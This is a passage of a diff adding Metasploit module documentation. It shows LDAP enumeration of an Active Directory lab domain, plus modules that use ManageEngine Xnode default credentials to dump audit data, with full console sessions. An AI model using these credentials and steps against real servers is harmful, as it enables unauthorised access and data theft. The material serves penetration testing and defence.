+aka query that you want to send to the target LDAP server.
+
+### QUERY_ATTRIBUTES
+Used only when the `RUN_SINGLE_QUERY` action is used. Should be a comma separated list
+of attributes to display from the full result set for each entry that was returned by the
+target LDAP server. Used to filter the results down to manageable sets of data.
+
+## Scenarios
+
+### RUN_SINGLE_QUERY with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_SINGLE_QUERY
+ACTION => RUN_SINGLE_QUERY
+msf6 auxiliary(gather/ldap_query) > set QUERY_ATTRIBUTES dn,displayName,name
+QUERY_ATTRIBUTES => dn,displayName,name
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILTER (objectClass=*)
+QUERY_FILTER => (objectClass=*)
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Sending single query (objectClass=*) to the LDAP server...
+[*] DC=daforest DC=com
+==================
+
+ Name  Attributes
+ ----  ----------
+ name  daforest
+
+[*] CN=Users DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Users
+
+[*] CN=Computers DC=daforest DC=com
+===============================
+
+ Name  Attributes
+ ----  ----------
+ name  Computers
+
+*cut for brevity*
+
+[*] CN=WAPPS1000022 OU=TST OU=Tier 1 DC=daforest DC=com
+===================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WAPPS1000022
+ name         WAPPS1000022
+
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+=================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WLPT1000014
+ name         WLPT1000014
+
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+================================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WWKS1000016
+ name         WWKS1000016
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WVIR1000013
+ name         WVIR1000013
+ 
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### RUN_QUERY_FILE with Table Output
+
+Here is the sample query file we will be using:
+
+```
+$ cat test.yaml
+---
+queries:
+  - action: ENUM_USERS
+    description: "Enumerate users"
+    filter: "(|(objectClass=inetOrgPerson)(objectClass=user)(sAMAccountType=805306368)(objectClass=posixAccount))"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: "Enumerate organizational units"
+    filter: "(objectClass=organizationalUnit)"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_GROUPS
+    description: "Enumerate groups"
+    filter: "(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))"
+    columns:
+      - dn
+      - name
+      - groupType
+      - memberof
+```
+
+Here is the results of using this file with the `RUN_QUERY_FILE` action which will
+run all queries within the file one after another.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_QUERY_FILE 
+ACTION => RUN_QUERY_FILE
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILE_PATH /home/gwillcox/git/metasploit-framework/test.yaml
+QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name             Current Setting                     Required  Description
+   ----             ---------------                     --------  -----------
+   BASE_DN                                              no        LDAP base DN if you already have it
+   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
+   BIND_PW          thePassword123                      no        Password for the BIND_DN
+   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
+                    ework/test.yaml
+   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
+                                                                  ramework/wiki/Using-Metasploit
+   RPORT            389                                 yes       The target port
+   SSL              false                               no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Loading queries from /home/gwillcox/git/metasploit-framework/test.yaml...
+[*] Running ENUM_USERS...
+[*] CN=Administrator CN=Users DC=daforest DC=com
+============================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for administering the computer/domain
+ name         Administrator
+
+[*] CN=Guest CN=Users DC=daforest DC=com
+====================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for guest access to the computer/domain
+ name         Guest
+
+*cut for brevity*
+
+[*] Running ENUM_ORGUNITS...
+[*] OU=Domain Controllers DC=daforest DC=com
+========================================
+
+ Name         Attributes
+ ----         ----------
+ description  Default container for domain controllers
+ name         Domain Controllers
+
+[*] OU=Admin DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Admin
+
+[*] OU=Tier 0 OU=Admin DC=daforest DC=com
+=====================================
+
+ Name  Attributes
+ ----  ----------
+ name  Tier 0
+
+*cut for brevity*
+
+[*] Running ENUM_GROUPS...
+[*] CN=Administrators CN=Builtin DC=daforest DC=com
+===============================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Administrators
+
+[*] CN=Users CN=Builtin DC=daforest DC=com
+======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Users
+
+[*] CN=Guests CN=Builtin DC=daforest DC=com
+=======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Guests
+
+[*] CN=Print Operators CN=Builtin DC=daforest DC=com
+================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Print Operators
+
+[*] CN=Backup Operators CN=Builtin DC=daforest DC=com
+=================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Backup Operators
+ 
+*cut for brevity*
+
+[*] CN=EL-chu-distlist1 OU=T2-Roles OU=Tier 2 OU=Admin DC=daforest DC=com
+=====================================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483646
+ name       EL-chu-distlist1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   BASE_DN                         no        LDAP base DN if you already have it
+   BIND_DN                         no        The username to authenticate to LDAP server
+   BIND_PW                         no        Password for the BIND_DN
+   OUTPUT_FORMAT  table            yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
+                                             etasploit
+   RPORT          389              yes       The target port
+   SSL            false            no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_query) > set ACTION 
+set ACTION ENUM_ACCOUNTS             set ACTION ENUM_DOMAIN_CONTROLLERS   set ACTION ENUM_ORGROLES
+set ACTION ENUM_ALL_OBJECT_CATEGORY  set ACTION ENUM_EXCHANGE_RECIPIENTS  set ACTION ENUM_ORGUNITS
+set ACTION ENUM_ALL_OBJECT_CLASS     set ACTION ENUM_EXCHANGE_SERVERS     set ACTION RUN_QUERY_FILE
+set ACTION ENUM_COMPUTERS            set ACTION ENUM_GROUPS               
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+===========================================================
+
+ Name                    Attributes
+ ----                    ----------
+ distinguishedname       CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com
+ dnshostname             WIN-F7DQC9SR0HD.daforest.com
+ name                    WIN-F7DQC9SR0HD
+ operatingsystemversion  10.0 (20348)
+
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+===============================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        FSRWLPT1000000
+ distinguishedname  CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com
+ name               FSRWLPT1000000
+
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+=====================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        TSTWVIR1000000
+ distinguishedname  CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com
+ name               TSTWVIR1000000
+
+*cut for brevity*
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        WVIR1000013
+ distinguishedname  CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com
+ name               WVIR1000013
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with CSV Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT csv 
+OUTPUT_FORMAT => csv
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  csv                  yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] Name,Attributes
+"dn","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"distinguishedname","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"name","WIN-F7DQC9SR0HD"
+"operatingsystemversion","10.0 (20348)"
+"dnshostname","WIN-F7DQC9SR0HD.daforest.com"
+
+[*] Name,Attributes
+"dn","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"displayname","FSRWLPT1000000"
+"name","FSRWLPT1000000"
+
+[*] Name,Attributes
+"dn","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"displayname","TSTWVIR1000000"
+"name","TSTWVIR1000000"
+
+*cut for brevity*
+
+[*] Name,Attributes
+"dn","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"displayname","WVIR1000013"
+"name","WVIR1000013"
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with JSON Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT json 
+OUTPUT_FORMAT => json
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  json                 yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+{
+  "dn": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "distinguishedname": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "name": "WIN-F7DQC9SR0HD",
+  "operatingsystemversion": "10.0 (20348)",
+  "dnshostname": "WIN-F7DQC9SR0HD.daforest.com"
+}
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+{
+  "dn": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "displayname": "FSRWLPT1000000",
+  "name": "FSRWLPT1000000"
+}
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+{
+  "dn": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "displayname": "TSTWVIR1000000",
+  "name": "TSTWVIR1000000"
+}
+*cut for brevity*
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+{
+  "dn": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "displayname": "WLPT1000014",
+  "name": "WLPT1000014"
+}
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+{
+  "dn": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "displayname": "WWKS1000016",
+  "name": "WWKS1000016"
+}
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+{
+  "dn": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "displayname": "WVIR1000013",
+  "name": "WVIR1000013"
+}
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
@@ -0,0 +1,156 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus
+versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml` that will
+be used if `CONFIG_FILE` is not set.
+
+The configuration file is also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note that when using this option the data won't be labeled.
+
+This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
+
+## Installation Information
+Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).
+All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of the latest version of ADAudit Plus can be downloaded
+[here](https://www.manageengine.com/products/active-directory-audit/download.html). To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch ADAudit Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_adaudit_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+```
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29118 - Target seems to be Xnode.
+[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
+[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
+[*] Auxiliary module execution completed
+```
+
+### ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)
+```
+msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
+password => custom_password
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                                                                 Required  Description
+   ----         ---------------                                                                                                 --------  -----------
+   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ode_conf.yaml
+   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                                                                           yes       The target port (TCP)
+   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+
+[*] Running module against 192.168.1.25
+
+[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
+[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
+[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
+[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
+[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
+[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
+[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
+[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched 
+DataSecurity Plus versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml`
+that will be used if `CONFIG_FILE` is not set.
+
+The configuration file is then also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note when using this option the data won't be labeled.
+
+This module has been successfully tested against DataSecurity Plus 6.0.1 (6010) running on Windows Server 2012 R2.
+
+## Installation Information
+Vulnerable versions of DataSecurity Plus are available [here](https://archives.manageengine.com/data-security/).
+All versions from 6000 through 6011 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of DataSecurity Plus can be downloaded [here](https://www.manageengine.com/data-security/download.html).
+To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine DataSecurity Plus instance for testing, follow these steps:
